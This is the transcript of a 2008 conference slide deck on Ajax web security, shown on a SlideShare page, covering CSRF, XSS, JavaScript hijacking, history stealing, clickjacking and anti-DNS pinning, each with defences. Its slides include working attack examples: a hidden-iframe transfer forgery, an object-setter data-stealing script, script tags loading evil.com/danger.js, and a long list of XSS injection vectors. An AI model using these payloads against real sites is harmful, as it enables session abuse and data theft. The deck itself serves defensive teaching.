Search

Ajax Security

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

3 comments

Comments 1 - 3 of 3 previous next Post a comment

  • m1ke Michael Hendrickx 2 years ago
    Same question, do you have screencasts available? Very nice presentation.

  • foobarph foobarph 2 years ago
    I think screencasts will be sent through our email, hehehe. ^_^ nice presentation joe

  • mrtopf mrtopf 2 years ago
    Great presentation but I would like to see the demos :-) Are there any screencasts available?

Post a comment
Embed Video
Edit your comment Cancel

Notes on slide 1

47 Favorites & 3 Groups

Ajax Security - Presentation Transcript

  1. Ajax Security Keeping your application safe Joe Walker Copyright SitePen, Inc. 2008. All Rights Reserved
  2. 89 out of 10 Websites have serious vulnerabilities Copyright SitePen, Inc. 2008. All Rights Reserved
  3. Goal: Keep the bad guys out of your website Copyright SitePen, Inc. 2008. All Rights Reserved
  4. The Attackers Who is the attacker? • Troublemakers / Thieves Who is the victim? • Your data / Your users / Your partners Copyright SitePen, Inc. 2008. All Rights Reserved
  5. Agenda CSRF, Login CSRF JavaScript Hijacking XSS History Stealing Combination Attacks Session Fixation + ADP + Clickjacking Copyright SitePen, Inc. 2008. All Rights Reserved
  6. CSRF (Cross Site Request Forgery) You can still abuse someone else’s cookies and headers even if you can’t read them
  7. Recap: Cross-Domain Rules www.bank.com www.evil.com c = document.cookie; c = document.cookie; alert(c); alert(c); /* /* Shows cookies from Shows cookies from www.bank.com www.evil.com */ */ Copyright SitePen, Inc. 2008. All Rights Reserved
  8. Abusing a Cookie without reading it www.bank.com www.evil.com Welcome to Bank.com Welcome to Evil.com We offer the best rates anywhere in We’ve got lots of warez to give away the world, guaranteed. Give us your for freee. Download our stuffs and money and we will look after it in then come back and get more the same way we look after little stuffs. Videoz, Warez, Codez, Mp3s baby kittens. . <iframe width=0 height=0 src=\"http://bank.com/transfer?amnt=all&dest=MrEvil\"/> Copyright SitePen, Inc. 2008. All Rights Reserved
  9. CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: • <iframe src=\"dangerous_url\"> • or <img src=\"dangerous_url\"/> • or <script src=\"dangerous_url\"> You can’t use XHR because cross-domain rules prevent the request from being sent Copyright SitePen, Inc. 2008. All Rights Reserved
  10. CSRF CSRF attacks are write-only (with one exception) Both GET and POST can be forged Referrer checking is not a complete fix It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens Copyright SitePen, Inc. 2008. All Rights Reserved
  11. CSRF - Protection Not 100% solution Force users to log off Check referrer headers (https only) Include authentication tokens The only complete in the body of EVERY request solution Copyright SitePen, Inc. 2008. All Rights Reserved
  12. CSRF - Protection Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc) POST means forms with hidden fields • OWASP servlet filter http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with Javascript and submit in the body Copyright SitePen, Inc. 2008. All Rights Reserved
  13. Login CSRF (Tricking someone into thinking they are you) CSRF turned inside out
  14. Login CSRF If I can make your browser do things behind your back, how about logging you out of some service and back in as me. What are the possibilities when you think that you are you, but you’re not; you’re me? Copyright SitePen, Inc. 2008. All Rights Reserved
  15. Login CSRF - Attacks What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc Copyright SitePen, Inc. 2008. All Rights Reserved
  16. Login CSRF - Defense If submitting over https: use Referrer checking • Do not assume no referrer is safe Use authentication tokens in your login form Watch out for session fixation attacks • Invalidate the server session on login and re-create it Copyright SitePen, Inc. 2008. All Rights Reserved
  17. JavaScript Hijacking (or how your GMail contacts were at risk) Sucking data out of Objects before they’re created
  18. JavaScript Hijacking “CSRF is write-only with one known exception” Using <script> automatically evaluates the returned script So if you can just find a way to intercept scripts as they are evaluated ... Copyright SitePen, Inc. 2008. All Rights Reserved
  19. <script type=\"text/javascript\"> function Object() { alert(\"Hello, World\"); } var x = {}; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  20. <script type=\"text/javascript\"> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = \"Hello, World\"; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  21. <script type=\"text/javascript\"> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout(\"obj['killme']='ignored';\", 0); } </script> <script src=\"http://example.com/data-service/\"> Copyright SitePen, Inc. 2008. All Rights Reserved
  22. JavaScript Hijacking When you serve JavaScript from a website it could be evaluated in a hostile environment Protect secrets in JavaScript in the same way that you would protect them elsewhere Copyright SitePen, Inc. 2008. All Rights Reserved
  23. JavaScript Hijacking Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don’t do this) while(true); <JSON_HERE> (Google) throw new Error(\"\"); <JSON_HERE> (DWR) {}&& <JSON_HERE> Copyright SitePen, Inc. 2008. All Rights Reserved
  24. XSS (Cross Site Scripting) Abusing someone’s trust in your typing
  25. Copyright SitePen, Inc. 2008. All Rights Reserved
  26. XSS 2 types: • Reflected: Script embedded in the request is ‘reflected’ in the response • Stored: Attacker’s input is stored and played back in later page views Copyright SitePen, Inc. 2008. All Rights Reserved
  27. XSS Scenario: You let the user enter their name Someone is going to enter their name like this: Joe<script src=\"http://evil.com/danger.js\"> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc Copyright SitePen, Inc. 2008. All Rights Reserved
  28. XSS - Making User Input Safe So, you filter out ‘<script.*>’ and then you’re safe. Right? Copyright SitePen, Inc. 2008. All Rights Reserved
  29. XSS - Places that scripts get eval()ed 1. <table background=\"javascript:danger()\"> 14.<body background=\"javascript:danger()\"> 2. <input type='image' src='javascript:danger()'/> 15.<div onscroll='danger()'> 3. <object type=\"text/x-scriptlet\" 16.<div onmouseenter='danger()'> data=\"evil.com/danger.js\"> 17.<style> 4. <img src='javascript:danger()'/> @import evil.com/danger.js</style> 5. <frameset> 18.<style>BODY{-moz-binding:url( <frame src=\"javascript:danger()\"> \"http://evil.com/danger.js#xss\" )}</style> 6. <link rel=\"stylesheet\" href=\"javascript:danger()\"/> 19.<xss style=\"behavior:url(danger.htc);\"> 7. <base href=\"javascript:danger()\"> 20.<div style=\"background-image: 8. <meta http-equiv=\"refresh\" url(javascript:danger())\"> content=\"0;url=javascript:danger()\"> 21.<div style=\"width: 9. <p style='background-image: expression(danger());\"> url(\"javascript:danger()\")'); 22.<xss style=\"xss:expression(danger())\"> 10.<a href='javascript:danger()'> 11.<tr background=\"javascript:danger()\"> Many more 12.<body onload='danger()'> http://ha.ckers.org/xss.html 13.<div onmouseover='danger()'> Copyright SitePen, Inc. 2008. All Rights Reserved
  30. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=\"a.html\" link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  31. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=\"a.html\">link makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  32. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=\"a.html >link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  33. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href=\"a.html\"¾link¼/a¾ makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  34. XSS - Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these Copyright SitePen, Inc. 2008. All Rights Reserved
  35. XSS - The Heart of the Problem “Be conservative in what you do; be liberal in what you accept from others” Postel’s Law Copyright SitePen, Inc. 2008. All Rights Reserved
  36. XSS - The Heart of the Problem In + A Out B Copyright SitePen, Inc. 2008. All Rights Reserved
  37. The web developers get lazy ... Copyright SitePen, Inc. 2008. All Rights Reserved
  38. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  39. The users like the new browser ... Copyright SitePen, Inc. 2008. All Rights Reserved
  40. The web developers get even lazier ... Copyright SitePen, Inc. 2008. All Rights Reserved
  41. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  42. The users like the new browser even more ... Copyright SitePen, Inc. 2008. All Rights Reserved
  43. XSS - The Heart of the Problem ¼STYLE¾@im\\port'\\ja\\vas c\\ri pt:danger()';¼/STYLE¾ Copyright SitePen, Inc. 2008. All Rights Reserved
  44. XSS - Protection (HTML is Illegal) 1. Filter inputs by white-listing input characters • Remember to filter header names and values 2. Filter outputs for the destination environment For HTML: < &lt; > &gt; ' &apos; \" &quot; & &amp; For JavaScript Strings (but see later): ' \\' \" \\\" LF \\n CR \\r * \\uXXXX Other environments have other special chars Copyright SitePen, Inc. 2008. All Rights Reserved
  45. XSS - Protection (well-formed HTML is legal) 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags. e.g.: • &lt;strong&gt; <strong> 5. Take extra care over attributes: • &lta href=&quot;\\([^&]*\\)&quot;\\/&gt; <a href=\"$1\"/> 6. Take great care over regular expressions Copyright SitePen, Inc. 2008. All Rights Reserved
  46. XSS - Protection (malformed HTML is legal) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes Copyright SitePen, Inc. 2008. All Rights Reserved
  47. There is NO WAY to protect against some injection points Copyright SitePen, Inc. 2008. All Rights Reserved
  48. XSS - Injection Points Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value=\"$\"> (but take care) • Javascript string values: <script>str = \"$\";</script> (but take care) Anything else is likely to be unsafe Copyright SitePen, Inc. 2008. All Rights Reserved
  49. XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style=\"$\">... • <div background=\"$\"> • <img src=\"$\"> • etc If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole Copyright SitePen, Inc. 2008. All Rights Reserved
  50. XSS Tricks: Comment Power-up Copyright SitePen, Inc. 2008. All Rights Reserved
  51. XSS - Comment Power-up Commonly reflected attacks have length restrictions How to create space for an injection attack • Use ‘<script>/*’ in an restricted unprotected field and ‘*/’ in a later unrestricted protected field Copyright SitePen, Inc. 2008. All Rights Reserved
  52. XSS - Summary For data input: • Restrict allowed characters for destination type For data output: • Escaped for the destination environment • Ensure encoding is specified (e.g. UTF-8) Allow inject only into known safe points Never assume that a hole is too small to jump through Copyright SitePen, Inc. 2008. All Rights Reserved
  53. History Stealing I know where you’ve been, parts 1, 2, 3
  54. History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer Copyright SitePen, Inc. 2008. All Rights Reserved
  55. History Stealing - Part 2 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server Copyright SitePen, Inc. 2008. All Rights Reserved
  56. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src=\"http://mail.google.com/mail\"> http://ha.ckers.org/weird/javascript-website-login-checker.html Copyright SitePen, Inc. 2008. All Rights Reserved
  57. History Stealing - Part 3 A page can quickly check thousands of sites and find where you bank and store your email A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links sends links back • Page checks and follows a click-stream Copyright SitePen, Inc. 2008. All Rights Reserved
  58. Combination Attacks Small holes don’t add up, they multiply up
  59. Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  60. Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  61. Clickjacking When the page you are looking at is not the page you think you are looking at
  62. Clickjacking - Protection if (window.top != window) { document.body.style.display = \"none\"; } Copyright SitePen, Inc. 2008. All Rights Reserved
  63. ADP = Anti DNS Pinning Moving intranet servers into your domain
  64. Anti-DNS Pinning DNS for evil.com 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  65. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Let’s visit evil.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  66. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  67. Anti-DNS Pinning DNS for evil.com You need 1.2.3.4 (timeout = 1 sec) 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  68. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have http://evil.com? 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  69. Anti-DNS Pinning HTML + DNS for evil.com JavaScript that creates an iframe 2 seconds after 1.2.3.4 the page has loaded 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  70. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Time passes (2 seconds) 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  71. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  72. Anti-DNS Pinning DNS for evil.com You need 10.0.0.1 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  73. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have 10.0.0.1 http://evil.com/blah? Copyright SitePen, Inc. 2008. All Rights Reserved
  74. Anti-DNS Pinning DNS for evil.com 1.2.3.4 This web server is really http://intranet.corp.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  75. Anti-DNS Pinning Outer frame reads DNS for evil.com text from inner iframe and sends it back to 1.2.3.4 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  76. Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts DNS round-robin forces re-query of DNS if website appears to be down So websites can get around pins by firewalling themselves thus appearing to be down Copyright SitePen, Inc. 2008. All Rights Reserved
  77. Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: Cookie protected resources are safe (for now) But it’s great for Intranet hacking No cookies needed to read from 192.168.0.1 or 127.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  78. Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe Copyright SitePen, Inc. 2008. All Rights Reserved
  79. Web 2.0 Hacking Everything has a down side
  80. Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow Copyright SitePen, Inc. 2008. All Rights Reserved
  81. More Information Copyright SitePen, Inc. 2008. All Rights Reserved
  82. Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc. Copyright SitePen, Inc. 2008. All Rights Reserved
  83. Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCooikes - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP General: • Paros - Filtering Proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE Copyright SitePen, Inc. 2008. All Rights Reserved

Joe WalkerJoe Walker, 2 years ago

custom

21092 views, 47 favs, 90 embeds more stats

A talk from the Ajax Experience

More Info

© All Rights Reserved

Go to text version
  • Total Views 21092
    • 14664 on SlideShare
    • 6428 from embeds
  • Comments 3
  • Favorites 47
  • Downloads 1556
Most viewed embeds
  • 2255 views on http://getahead.org
  • 1184 views on http://ajaxian.com
  • 546 views on http://directwebremoting.org
  • 454 views on http://laacz.lv
  • 435 views on http://www.gnucitizen.org

more

All embeds
  • 2255 views on http://getahead.org
  • 1184 views on http://ajaxian.com
  • 546 views on http://directwebremoting.org
  • 454 views on http://laacz.lv
  • 435 views on http://www.gnucitizen.org
  • 361 views on http://www.ajaxian.com
  • 173 views on http://www.logadmin.net
  • 90 views on http://hackathology.blogspot.com
  • 90 views on http://www.mimul.com
  • 76 views on http://www.netvibes.com
  • 73 views on http://latha-math.com
  • 66 views on http://php.by
  • 62 views on http://security4all.blogspot.com
  • 60 views on http://singe.za.net
  • 41 views on http://www.burakdayioglu.net
  • 39 views on http://www.sitepen.com
  • 39 views on http://www.blankus.net
  • 37 views on http://breach-inv.blogspot.com
  • 35 views on http://blog.code.ae
  • 23 views on http://www.dmxzone.com
  • 22 views on http://ajaxus.net
  • 16 views on http://feeds.feedburner.com
  • 13 views on http://min2liz.net
  • 12 views on http://www.hanrss.com
  • 11 views on http://s3.amazonaws.com
  • 11 views on http://websecurity.com.ua
  • 10 views on http://blog.ecmas4.com
  • 10 views on http://vie-eu-wik-01
  • 10 views on http://mimul.com
  • 10 views on file://
  • 9 views on http://extjs.com
  • 9 views on http://localhost:16296
  • 8 views on http://www.php.by
  • 8 views on http://ecruu.tistory.com
  • 8 views on http://www.ajax-blog.com
  • 7 views on http://lowe.wangandmin.com
  • 7 views on http://www.nofluffjuststuff.com
  • 7 views on http://kislo8metal.blogspot.com
  • 5 views on http://agileweb.org
  • 5 views on https://www.sitepen.com
  • 5 views on http://blankus.net
  • 5 views on http://www.dnzone.com
  • 5 views on http://swik.net
  • 5 views on http://www.flzone.com
  • 4 views on http://rhio.tistory.com
  • 4 views on http://koreasmileman.tistory.com
  • 3 views on http://bloggideas.blogspot.com
  • 3 views on http://22by7tech.blogspot.com
  • 3 views on http://www.pcsec.org
  • 3 views on http://www.stevenleija.com
  • 3 views on http://127.0.0.1:8795
  • 2 views on http://dmxzone.com
  • 2 views on http://newshutch.com
  • 2 views on http://www.techiegyan.com
  • 2 views on http://64.233.169.104
  • 2 views on http://blog.paran.com
  • 2 views on http://www.digitalsci.net
  • 2 views on http://www.filescon.com
  • 2 views on http://web0.streamy.com
  • 2 views on http://www.singe.za.net
  • 1 views on http://www.security4all.blogspot.com
  • 1 views on http://www.tutorials4html.com
  • 1 views on http://onion-security.net
  • 1 views on https://www.gnucitizen.org
  • 1 views on http://www.clearspring.com
  • 1 views on http://192.168.0.102
  • 1 views on http://www.rapidsharego.com
  • 1 views on http://www.therichwebexperience.com
  • 1 views on http://blog.security4all.be
  • 1 views on http://shoan.info
  • 1 views on http://209.85.175.104
  • 1 views on http://wildfire.gigya.com
  • 1 views on http://rdbcci:8088
  • 1 views on http://reader.odonnell.nu
  • 1 views on http://networks.feedburner.com
  • 1 views on http://localhost
  • 1 views on http://www.pageflakes.com
  • 1 views on http://www.workingwithrails.com
  • 1 views on http://www.mimul.com:80
  • 1 views on http://www.fwzone.net
  • 1 views on http://vilani.lathost.lv
  • 1 views on http://64.233.167.104
  • 1 views on http://getahead.org:80
  • 1 views on http://64.233.179.104
  • 1 views on http://www.cfzone.net
  • 1 views on http://www.newshutch.com
  • 1 views on http://securityinfo.pl
  • 1 views on http://sbs.uniplicity.lt
  • 1 views on http://www.slideshare.net
  • 1 views on http://www.xianguo.com

less

Flagged as inappropriate Flag as inappropriate
Flag as innappropriate

Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

Cancel

Categories

Tags

more

Groups / Events

Search
RSS Feed
What's new?

© 2009 SlideShare Inc. All Rights Reserved